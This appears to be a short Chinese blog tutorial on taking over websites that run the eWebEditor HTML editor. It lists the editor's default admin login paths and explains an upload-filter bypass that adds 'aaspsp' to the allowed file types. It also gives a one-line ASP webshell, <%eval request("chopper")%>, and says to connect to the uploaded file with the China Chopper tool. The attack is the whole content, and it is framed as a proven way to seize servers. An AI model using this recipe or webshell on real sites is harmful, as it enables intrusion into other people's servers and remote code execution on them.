eWebEditor编辑器获取webshell

一大帮水货正在赶来!

eWebEditor是一个基于浏览器的在线HTML编辑器。因为十分的好用而拥有相当多的用户。虽然很老了。但是它也助我们小菜拿了很多的webshell
本地搭建网站进行测试

进入正题

—————————————————————————————————————

1、编辑器默认的后台登陆口:

Editor/admin/asp/upload.asp
Editor/admin_login.asp
ewebeditor/admin_login.asp
admin/Editor/admin_login.asp
admin/ewebeditor/admin_login.asp

2.进入后台之后

找上传的地方


eWebEditor编辑器获取webshell_第1张图片
图片.png

注:添加图片类型这里,会出错,如果直接是asp|aspx|cer 上传文件会出错,也不能解析,要上传aaspsp|aspx|cer ,这样就可以解析

添加工具栏——按钮设置——添加或者修改图片

eWebEditor编辑器获取webshell_第2张图片
图片.png

上传木马<%eval request("chopper")%>

eWebEditor编辑器获取webshell_第3张图片
图片.png

可以访问上传的木马,则可以使用菜刀进行连接。

eWebEditor编辑器获取webshell_第4张图片
图片.png
eWebEditor编辑器获取webshell_第5张图片
图片.png

你可能感兴趣的:(eWebEditor编辑器获取webshell)